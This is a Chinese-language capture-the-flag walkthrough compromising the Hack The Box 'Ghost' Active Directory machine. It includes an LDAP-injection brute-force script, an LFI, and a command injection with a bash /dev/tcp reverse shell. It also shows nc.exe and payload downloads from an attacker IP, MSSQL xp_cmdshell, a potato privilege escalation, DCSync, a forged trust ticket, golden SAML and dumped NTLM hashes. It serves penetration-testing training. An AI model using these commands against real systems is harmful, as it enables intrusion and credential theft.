基本信息

端口扫描

80.8008.8443,以及常规域端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
$ nmap -sC -sV 10.10.11.24
Starting Nmap 7.95 ( https://nmap.org ) at 2024-07-15 14:32 CST
Nmap scan report for 10.10.11.24
Host is up (0.090s latency).
Not shown: 982 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-15 06:25:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: ghost.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after:  2124-06-19T15:55:55
443/tcp  open  https?
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: ghost.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after:  2124-06-19T15:55:55
|_ssl-date: TLS randomness does not represent time
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: ghost.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after:  2124-06-19T15:55:55
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: ghost.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after:  2124-06-19T15:55:55
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-07-15T06:26:48+00:00; -7m49s from scanner time.
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Not valid before: 2024-06-16T15:49:55
|_Not valid after:  2024-12-16T15:49:55
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8008/tcp open  http          nginx 1.18.0 (Ubuntu)
|_http-title: Ghost
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-robots.txt: 5 disallowed entries
|_/ghost/ /p/ /email/ /r/ /webmentions/receive/
|_http-generator: Ghost 5.78
8443/tcp open  ssl/http      nginx 1.18.0 (Ubuntu)
| http-title: Ghost Core
|_Requested resource was /login
|_http-server-header: nginx/1.18.0 (Ubuntu)
| tls-nextprotoneg:
|_  http/1.1
| ssl-cert: Subject: commonName=core.ghost.htb
| Subject Alternative Name: DNS:core.ghost.htb
| Not valid before: 2024-06-18T15:14:02
|_Not valid after:  2124-05-25T15:14:02
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
Service Info: Host: DC01; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: -7m49s, deviation: 0s, median: -7m49s
| smb2-time:
|   date: 2024-07-15T06:26:07
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.76 seconds

80

直接访问是404:

8008

ghost 博客:

8443

Ghost core,登录用的ADFS,会跳到federation.ghost.htb域名:

子域名扫描

8443那里的到的子域名加hosts,扫描其他域名:

1
10.10.11.24 ghost.htb federation.ghost.htb

需要用8008端口,因为80默认404:

1
2
3
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://ghost.htb:8008/" -H 'Host: FUZZ.ghost.htb' -fs 0,7676

intranet                [Status: 307, Size: 3968, Words: 52, Lines: 1, Duration: 112ms]

intranet

加hosts访问,是登录界面:

intranet

LDAP注入

登录请求也可以看出使用的ldap,简单测试发现ldap注入,用户名密码都使用星号,登录进intranet:

gitea

news中可以看到gitea相关信息,用户名gitea_temp_principal,并且提到可以在intranet测试gitea密码:

forum

forum中可以看到Bitbucket信息bitbucket.ghost.htb,可以猜测gitea就是gitea.ghost.htb:

gitea password

根据已有信息,通过ldap注入爆破出用于登录gitea的gitea_temp_principal用户的密码:

1
szrr8kpc3z6onlqf

ldap_brute.py

来自BF论坛:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import string
import requests

url = 'http://intranet.ghost.htb:8008/login'

headers = {
    'Host': 'intranet.ghost.htb:8008',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate, br',
    'Next-Action': 'c471eb076ccac91d6f828b671795550fd5925940',
    'Connection': 'keep-alive'
}

files = {
    '1_ldap-username': (None, 'gitea_temp_principal'),
    '1_ldap-secret': (None, 's*'),
    '0': (None, '[{},"$K1"]')
}


passw = ""
while True:
    for char in string.ascii_lowercase + string.digits:
        files = {
            '1_ldap-username': (None, 'gitea_temp_principal'),
            '1_ldap-secret': (None, f'{passw}{char}*'),
            '0': (None, '[{},"$K1"]')
        }
        res = requests.post(url, headers=headers, files=files)
        if res.status_code == 303:
            passw += char
            print(f"Passwd: {passw}")
            break
    else:
        break
print(passw)

gitea

得到的账号密码登录gitea:

1
2
gitea_temp_principal
szrr8kpc3z6onlqf

extra lfi

然后查看代码发现一个函数使用接收到的extra参数拼接到目录然后读取,可能存在LFI:

api key

调用需要apikey,readme中给出了public api key,并且指出DEV_INTRANET_KEY环境变量是内部API key:

scan.rs

另外api dev中发现scan函数直接调用bash,可能命令注入:

LFI

所以使用public api key去读环境变量:

1
2
3
http://ghost.htb:8008/ghost/api/v3/content/posts/?extra=../../../../proc/self/environ&key=a5af628828958c976a3b6cc81a

DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe

命令注入

现在得到了dev的api key,然后就是去调用scan进行命令注入:

1
curl http://intranet.ghost.htb:8008/api-dev/scan -X POST -H 'X-DEV-INTRANET-KEY: !@yqr!X2kxmQ.@Xe' -H 'Content-Type: application/json' -d '{"url": "0<&196;exec 196<>/dev/tcp/10.10.14.10/4444; /bin/bash <&196 >&196 2>&196"}'

得到一个容器内root:

docker-entrypoint.sh

根目录docker-entrypoint.sh发现ssh连接信息:

1
sshpass -p 'uxLmt*udNc6t3HrF' ssh -o "StrictHostKeyChecking no" florence.ramirez@ghost.htb@dev-workstation exit

MSSQL 非预期

(直接mssql登录是非预期,预期补在后面)

上面的到的florence.ramirez账号密码可以连接mssql以及运行bloodhound收集:

1
python3 examples/mssqlclient.py florence.ramirez:'uxLmt*udNc6t3HrF'@ghost.htb -windows-auth

只是guest,但存在linked server,OSEP style:

后面就是常规跳转,模拟用户,执行命令:

1
2
3
4
5
6
7
SQL (GHOST\florence.ramirez  guest@master)> enum_links
SQL (GHOST\florence.ramirez  guest@master)> use_link [PRIMARY]
SQL >[PRIMARY] (bridge_corp  bridge_corp@master)> use master
SQL >[PRIMARY] (bridge_corp  bridge_corp@master)> enum_impersonate
SQL >[PRIMARY] (bridge_corp  bridge_corp@master)> exec_as_login sa
SQL >[PRIMARY] (sa  dbo@master)> enable_xp_cmdshell
SQL >[PRIMARY] (sa  dbo@master)> xp_cmdshell whoami

shell

有杀软,简单的nc shell:

1
2
xp_cmdshell powershell -c "Invoke-WebRequest -Uri http://10.10.14.10:7777/nc.exe -OutFile $env:TEMP\nc.exe"
xp_cmdshell %TEMP%\nc.exe -e cmd.exe 10.10.14.10 4444

meterpreter

然后自己做一下免杀,得到meterpreter:

1
2
3
4
5
# handler
set AutoRunScript "migrate -n explorer.exe"

wget http://10.10.14.10:7778/miao.exe -O miao.exe
start-process miao.exe

system

然后就是常规的mssql to system,meterpreter一键getsystem后会立即掉线,但知道用的efs,自己手动执行efspotato即可:

1
2
3
4
wget http://10.10.14.10:7778/EfsPotato.exe -O EfsPotato.exe

.\EfsPotato.exe whoami.exe
.\EfsPotato.exe miao.exe

PRIMARY hashdump

1
2
3
4
5
6
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:41515af3ada195029708a53d941ab751:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:69eb46aa347a8c68edb99be2725403ab:::
PRIMARY$:1000:aad3b435b51404eeaad3b435b51404ee:27f92da5e3d79962020ddebc08ed7d70:::
GHOST$:1103:aad3b435b51404eeaad3b435b51404ee:dae1ad83e2af14a379017f244a2f5297::

域信任

现在得到的是corp.ghost.htb子域,PRIMARY就是子域DC,基础的子域到父域:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
bloodhound-python -ns 10.10.11.24 -dc dc01.ghost.htb -d ghost.htb -c All -u florence.ramirez  -p 'uxLmt*udNc6t3HrF' --zip

IEX ((new-object net.webclient).downloadstring('http://10.10.14.10:7777/PowerView.ps1'))

mimikatz # lsadump::dcsync /all /csv
502	krbtgt	69eb46aa347a8c68edb99be2725403ab	514
1103	GHOST$	dae1ad83e2af14a379017f244a2f5297	2080
500	Administrator	41515af3ada195029708a53d941ab751	512
1000	PRIMARY$	27f92da5e3d79962020ddebc08ed7d70	532480

ghost.htb S-1-5-21-4084500788-938703357-3654145966
corp.ghost.htb S-1-5-21-2034262909-2733679486-179904498

python3 examples/ticketer.py -nthash dae1ad83e2af14a379017f244a2f5297 -domain-sid S-1-5-21-2034262909-2733679486-179904498 -domain corp.ghost.htb -extra-sid S-1-5-21-4084500788-938703357-3654145966-519 -spn "krbtgt/ghost.htb" Administrator

export KRB5CCNAME=./Administrator.ccache
python3 examples/getST.py -k -no-pass -debug -spn "CIFS/DC01.ghost.htb" "ghost.htb/Administrator@ghost.htb"

export KRB5CCNAME=./Administrator@ghost.htb@CIFS_DC01.ghost.htb@GHOST.HTB.ccache
python3 examples/secretsdump.py -k -no-pass -debug Administrator@DC01.ghost.htb -dc-ip 10.10.11.24 -just-dc-ntlm

预期 user

florence.ramirez是IT组成员,前面也可以看到bitbucket.ghost.htb这个域名没有解析,但justin会去访问,所以就是加一条dns记录,获取justion的net ntlm然后破解,这部分和Intelligence类似:

1
2
3
4
5
python3 dnstool.py -u GHOST\\florence.ramirez -p 'uxLmt*udNc6t3HrF' -r bitbucket.ghost.htb -a add -d 10.10.14.10 10.10.11.24

sudo python3 Responder.py -i 10.10.14.10 -v

justin.bradley::ghost:1122334455667788:12C3640D8F04914DAD01743B98951C0D:0101000000000000E9465C171AD7DA01DE7751958EB3EB710000000002000800450050004800540001001E00570049004E002D0030004A005600320050005300460042003200430044000400140045005000480054002E004C004F00430041004C0003003400570049004E002D0030004A005600320050005300460042003200430044002E0045005000480054002E004C004F00430041004C000500140045005000480054002E004C004F00430041004C000800300030000000000000000000000000400000F5CAC57B5107957E1FA923DACEF63DDAB22784A229532938928AF18113FD5C410A001000000000000000000000000000000000000900300048005400540050002F006200690074006200750063006B00650074002E00670068006F00730074002E006800740062000000000000000000

然后破解出justin密码,winrm登录dc,获得user.txt:

1
2
3
4
5
sudo hashcat -m 5600 hash.txt ~/Tools/dict/rockyou.txt

Qwertyuiop1234$$

evil-winrm -i 10.10.11.24 -u 'justin.bradley' -p 'Qwertyuiop1234$$'

GMSA

然后justin去读gmsa:

1
2
3
netexec ldap 10.10.11.24 -u 'justin.bradley' -p 'Qwertyuiop1234$$' --gmsa

Account: adfs_gmsa$           NTLM: 4f4b81c5f6a9c1931310ece55a02a8d6

adfs_gmsa$也可以登录:

1
evil-winrm -i 10.10.11.24 -u 'adfs_gmsa$' -H 4f4b81c5f6a9c1931310ece55a02a8d6

ADFS

然后前面adfs web那里如果使用其他账号登录能够看到提示只允许Administrator,所以就是需要伪造管理员,基础的在adfs_gmsa$的shell中运行dump获取信息然后golden saml:

1
2
3
4
.\ADFSDump.exe
# ADFSDump会得到两个私钥,自己试一下就知道第二个才是正确的

python ADFSpoof.py -b TKSKey.bin DKMKey.bin -s core.ghost.htb saml2 --endpoint https://core.ghost.htb:8443/adfs/saml/postResponse --nameidformat urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress --nameid Administrator@ghost.htb --rpidentifier https://core.ghost.htb:8443 --assertions '<Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn"><AttributeValue>Administrator@ghost.htb</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/claims/CommonName"><AttributeValue>Administrator</AttributeValue></Attribute>'

MSSQL

然后就和非预期那里mssql后面基本一致了,linked server

1
EXECUTE('EXECUTE AS LOGIN = ''sa'' EXEC SP_CONFIGURE ''show advanced options'', 1;reconfigure;EXEC SP_CONFIGURE ''xp_cmdshell'' , 1;reconfigure;exec xp_cmdshell ''whoami''') AT "PRIMARY"

flags

得到的Administrator hash登录:

1
evil-winrm -i 10.10.11.24 -u 'Administrator' -H '1cdb17d5c14ff69e7067cffcc9e470bd'

DC01 hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
python3 examples/secretsdump.py -k -no-pass Administrator@DC01.ghost.htb -dc-ip 10.10.11.24 -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:1cdb17d5c14ff69e7067cffcc9e470bd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0cdb6ae71c3824f2da2815f69485e128:::
kathryn.holland:3602:aad3b435b51404eeaad3b435b51404ee:0adf6114ba230ef8f023eca3c0d1af50:::
cassandra.shelton:3603:aad3b435b51404eeaad3b435b51404ee:96d2251e44e42816314c08b8e1f11b87:::
robert.steeves:3604:aad3b435b51404eeaad3b435b51404ee:7e2e1e1163ff3fa9304ecd8df6f726fe:::
florence.ramirez:3606:aad3b435b51404eeaad3b435b51404ee:29542931896c7e7a9fbca17b0dd8ab6a:::
justin.bradley:3607:aad3b435b51404eeaad3b435b51404ee:a2be8ec65d6b212138cb36422ed32f46:::
arthur.boyd:3608:aad3b435b51404eeaad3b435b51404ee:b5b7f0787f3c07f42958d33518ae19a5:::
beth.clark:3610:aad3b435b51404eeaad3b435b51404ee:1582f51fcd02e2e5316d497f2552bb83:::
charles.gray:3611:aad3b435b51404eeaad3b435b51404ee:d2fe7f2c7484fc550cac49836eabca3d:::
jason.taylor:3612:aad3b435b51404eeaad3b435b51404ee:0159e6bd4326812f9a6c406ea84035e6:::
intranet_principal:3614:aad3b435b51404eeaad3b435b51404ee:e9fac15124e1d927cbd71f851792b04f:::
gitea_temp_principal:3615:aad3b435b51404eeaad3b435b51404ee:2058fa4502750fa5d7ebd874b1ea43a1:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:e6c3d61860f92e30e8e9744ac5d9783b:::
LINUX-DEV-WS01$:3630:aad3b435b51404eeaad3b435b51404ee:c6ca9ac2f26669168665c4ba16981a8b:::
adfs_gmsa$:4101:aad3b435b51404eeaad3b435b51404ee:4f4b81c5f6a9c1931310ece55a02a8d6:::
GHOST-CORP$:2101:aad3b435b51404eeaad3b435b51404ee:ba8ef93f824c0f3b1e98037ae08ab68c:::

参考资料